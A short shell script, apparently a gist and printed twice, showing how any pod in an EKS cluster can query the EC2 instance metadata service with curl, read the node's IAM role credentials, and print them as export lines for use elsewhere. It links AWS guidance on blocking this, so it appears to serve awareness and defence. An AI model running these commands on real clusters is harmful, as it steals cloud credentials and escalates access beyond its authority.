mlafeldt/run.sh

## run.sh
# kubectl run my-shell --rm -it --restart=Never --image alpine --command sh
apk add curl jq
BASEURL=http://169.254.169.254/latest/meta-data
ROLE=$(curl -s $BASEURL/iam/security-credentials)
CREDS=$(curl -s $BASEURL/iam/security-credentials/$ROLE)
AZ=$(curl -s $BASEURL/placement/availability-zone)
echo "export AWS_REGION=${AZ::-1}"; echo "$CREDS" | jq -r '{AWS_ACCESS_KEY_ID: .AccessKeyId, AWS_SECRET_ACCESS_KEY: .SecretAccessKey, AWS_SESSION_TOKEN: .Token} | to_entries | .[] | "export " + .key + "=" + .value'
# Paste the result into any shell and run `aws sts get-caller-identity` etc.
# What you can do about it:
# https://docs.aws.amazon.com/eks/latest/userguide/best-practices-security.html#restrict-ec2-credential-access
	# kubectl run my-shell --rm -it --restart=Never --image alpine --command sh
	apk add curl jq
	BASEURL=http://169.254.169.254/latest/meta-data
	ROLE=$(curl -s $BASEURL/iam/security-credentials)
	CREDS=$(curl -s $BASEURL/iam/security-credentials/$ROLE)
	AZ=$(curl -s $BASEURL/placement/availability-zone)
	echo "export AWS_REGION=${AZ::-1}"; echo "$CREDS" \| jq -r '{AWS_ACCESS_KEY_ID: .AccessKeyId, AWS_SECRET_ACCESS_KEY: .SecretAccessKey, AWS_SESSION_TOKEN: .Token} \| to_entries \| .[] \| "export " + .key + "=" + .value'
	# Paste the result into any shell and run `aws sts get-caller-identity` etc.
	# What you can do about it:
	# https://docs.aws.amazon.com/eks/latest/userguide/best-practices-security.html#restrict-ec2-credential-access